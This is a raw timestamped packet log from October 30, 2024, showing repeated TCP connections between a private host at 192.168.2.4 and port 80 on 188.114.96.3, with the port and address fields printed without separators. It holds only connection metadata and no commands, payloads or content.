                                                        Oct 30, 2024 05:24:44.726090908 CET8050191188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.726135015 CET5019180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.726712942 CET8050192188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:44.726772070 CET5019280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.726939917 CET5019280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:44.733580112 CET8050192188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:45.074845076 CET5019280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:45.480570078 CET5019280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:46.020467997 CET8050192188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:46.021267891 CET8050192188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:46.021321058 CET5019280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:46.022053957 CET8050192188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:46.022087097 CET5019280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:46.023032904 CET8050192188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:46.023169994 CET8050192188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:46.330694914 CET8050192188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:46.447257996 CET5019280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:46.448513031 CET5019380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:46.453178883 CET8050192188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:46.453239918 CET5019280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:46.453779936 CET8050193188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:46.453843117 CET5019380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:46.453974962 CET5019380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:46.459222078 CET8050193188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:46.808825970 CET5019380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:46.814214945 CET8050193188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:47.083333969 CET8050193188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:47.138994932 CET5019380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:47.287734985 CET8050193188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:47.339962006 CET5019380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:47.415060043 CET5019480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:47.420491934 CET8050194188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:47.423218012 CET5019480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:47.423495054 CET5019480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:47.428792000 CET8050194188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:47.777698040 CET5019480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:47.783134937 CET8050194188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:48.018280983 CET8050194188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:48.058629036 CET5019480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:48.212476015 CET8050194188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:48.261748075 CET5019480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:48.335773945 CET5019380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:48.337620974 CET5019480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:48.338273048 CET5019580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:48.343276024 CET8050194188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:48.343339920 CET5019480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:48.343558073 CET8050195188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:48.343616009 CET5019580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:48.343756914 CET5019580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:48.349006891 CET8050195188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:48.699438095 CET5019580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:48.704787016 CET8050195188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:48.945919991 CET8050195188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:48.999285936 CET5019580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.143122911 CET8050195188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.199258089 CET5019580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.272653103 CET5019580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.272654057 CET5019680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.278326988 CET8050196188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.278512955 CET5019680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.278737068 CET8050195188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.278769970 CET5019680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.279839039 CET5019580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.284126043 CET8050196188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.528815985 CET5019780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.528824091 CET5019680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.534152031 CET8050197188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.535443068 CET5019780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.535623074 CET5019780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.540882111 CET8050197188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.578947067 CET8050196188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.648473978 CET5019880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.653790951 CET8050198188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.659053087 CET5019880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.699381113 CET5019880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.704690933 CET8050198188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.780375004 CET8050196188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.783473015 CET5019680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.886852980 CET5019780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:49.892505884 CET8050197188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:49.892528057 CET8050197188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:50.058769941 CET5019880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.064352989 CET8050198188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:50.158257008 CET8050197188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:50.199269056 CET5019780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.258837938 CET8050198188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:50.308630943 CET5019880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.457633972 CET8050197188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:50.507677078 CET5019780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.578996897 CET8050198188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:50.621221066 CET5019880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.699914932 CET5019780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.700165033 CET5019880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.700838089 CET5019980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.706157923 CET8050199188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:50.706257105 CET5019980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.706348896 CET5019980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.708466053 CET8050197188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:50.708508015 CET8050198188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:50.708530903 CET5019780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.708565950 CET5019880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:50.711602926 CET8050199188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:51.058747053 CET5019980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:51.064218998 CET8050199188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:51.301786900 CET8050199188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:51.359003067 CET5019980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:51.501961946 CET8050199188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:51.558641911 CET5019980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:51.617682934 CET5020080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:51.623105049 CET8050200188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:51.628953934 CET5020080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:51.629121065 CET5020080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:51.634378910 CET8050200188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:51.980669975 CET5020080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:51.986037016 CET8050200188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:52.233932018 CET8050200188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:52.277383089 CET5020080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:52.437644005 CET8050200188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:52.438031912 CET8050200188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:52.438076019 CET5020080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:52.564791918 CET5020080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:52.566176891 CET5020180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:52.570669889 CET8050200188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:52.570719957 CET5020080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:52.571572065 CET8050201188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:52.571636915 CET5020180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:52.571768045 CET5020180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:52.577017069 CET8050201188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:52.918186903 CET5020180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:52.923615932 CET8050201188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:53.166647911 CET8050201188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:53.214914083 CET5020180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:53.379756927 CET8050201188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:53.436865091 CET5020180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:53.489687920 CET5020180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:53.492860079 CET5020280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:53.495960951 CET8050201188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:53.498157978 CET8050202188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:53.498285055 CET5020280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:53.498287916 CET5020180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:53.498373985 CET5020280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:53.503691912 CET8050202188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:53.855623960 CET5020280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:53.861041069 CET8050202188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:54.094176054 CET8050202188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:54.136784077 CET5020280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:54.287107944 CET8050202188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:54.339895010 CET5020280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:54.415761948 CET5020280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:54.416840076 CET5020380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:54.421375036 CET8050202188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:54.421422005 CET5020280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:54.422207117 CET8050203188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:54.422269106 CET5020380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:54.422363997 CET5020380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:54.427615881 CET8050203188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:54.802169085 CET5020380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:54.809757948 CET8050203188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.016844988 CET8050203188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.059876919 CET5020380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.323389053 CET8050203188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.372864962 CET5020380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.438925982 CET5019980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.438931942 CET5015880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.443881035 CET5020380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.444753885 CET5020480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.449366093 CET8050203188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.450110912 CET8050204188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.450215101 CET5020380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.450223923 CET5020480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.450628042 CET5020480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.455902100 CET8050204188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.466156960 CET5020480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.466244936 CET5020580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.471632957 CET8050205188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.471750975 CET5020580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.471803904 CET5020580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.477133036 CET8050205188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.514993906 CET8050204188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.586900949 CET5020680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.592231989 CET8050206188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.595462084 CET5020680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.595681906 CET5020680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.600929022 CET8050206188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.826931000 CET5020580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.832247019 CET8050205188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.832429886 CET8050205188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.928594112 CET8050204188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:55.934878111 CET5020480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.950937986 CET5020680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:55.956269026 CET8050206188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:56.077714920 CET8050205188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:56.119843006 CET5020580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.190857887 CET8050206188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:56.230540037 CET5020680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.284370899 CET8050205188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:56.390873909 CET8050206188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:56.390892982 CET8050206188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:56.390953064 CET5020680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.402424097 CET5020580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.827677011 CET5020580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.827753067 CET5020680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.829667091 CET5020780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.833355904 CET8050205188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:56.833467007 CET5020580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.833723068 CET8050206188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:56.833831072 CET5020680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.834971905 CET8050207188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:56.835042000 CET5020780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.835340023 CET5020780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:56.840639114 CET8050207188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:57.185832977 CET5020780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.191185951 CET8050207188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:57.437303066 CET8050207188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:57.480535030 CET5020780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.626342058 CET8050207188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:57.626383066 CET8050207188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:57.627444983 CET5020780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.741477013 CET5020780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.741482019 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.746805906 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:57.746953964 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.747072935 CET8050207188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:57.747126102 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.747251987 CET5020780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:57.752418995 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.105628014 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.111030102 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.341829062 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.386780977 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.544594049 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.589907885 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.666330099 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.667582989 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.671866894 CET8050208188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.671906948 CET5020880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.672849894 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:58.672913074 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.673005104 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:58.678210974 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.027501106 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.032818079 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.278403044 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.403079987 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.475835085 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.475889921 CET8050209188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.475964069 CET5020980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.599895000 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.605237961 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.605356932 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.605472088 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.610740900 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:24:59.951337099 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:24:59.956696987 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.193118095 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.235724926 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.388338089 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.471527100 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.509068966 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.510082960 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.515721083 CET8050210188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.515769958 CET5021080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.517117023 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.517184019 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.517308950 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.523183107 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:00.871265888 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:00.877028942 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.127054930 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.183687925 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.294610977 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.294631958 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.415355921 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.541915894 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.542124987 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.542588949 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.542601109 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.542673111 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.542678118 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.543322086 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.543539047 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.545155048 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.545500994 CET8050211188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.546420097 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.546504021 CET5021180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.551852942 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.551873922 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.906092882 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.906100988 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:01.911485910 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.911500931 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:01.911608934 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.135909081 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.169783115 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.183671951 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.267266035 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.382643938 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.456056118 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.496170044 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.496193886 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.570075989 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.570231915 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.570938110 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.576054096 CET8050212188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.576148033 CET5021280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.576303005 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.576373100 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.576448917 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.577033043 CET8050213188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.577083111 CET5021380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.581690073 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:02.933820009 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:02.939255953 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.179325104 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.230576038 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.370086908 CET8050214188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.419116974 CET5021480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.490906000 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.496320963 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.496603966 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.496715069 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.501952887 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:03.855652094 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:03.861037016 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.085153103 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.137279987 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.285214901 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.349585056 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.406888008 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.408098936 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.412482977 CET8050215188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.412528038 CET5021580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.413382053 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.413443089 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.413603067 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.418833017 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:04.762100935 CET5021680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:25:04.767606974 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.017786026 CET8050216188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:25:05.076076031 CET5021680192.168.2.4188.114.96.3
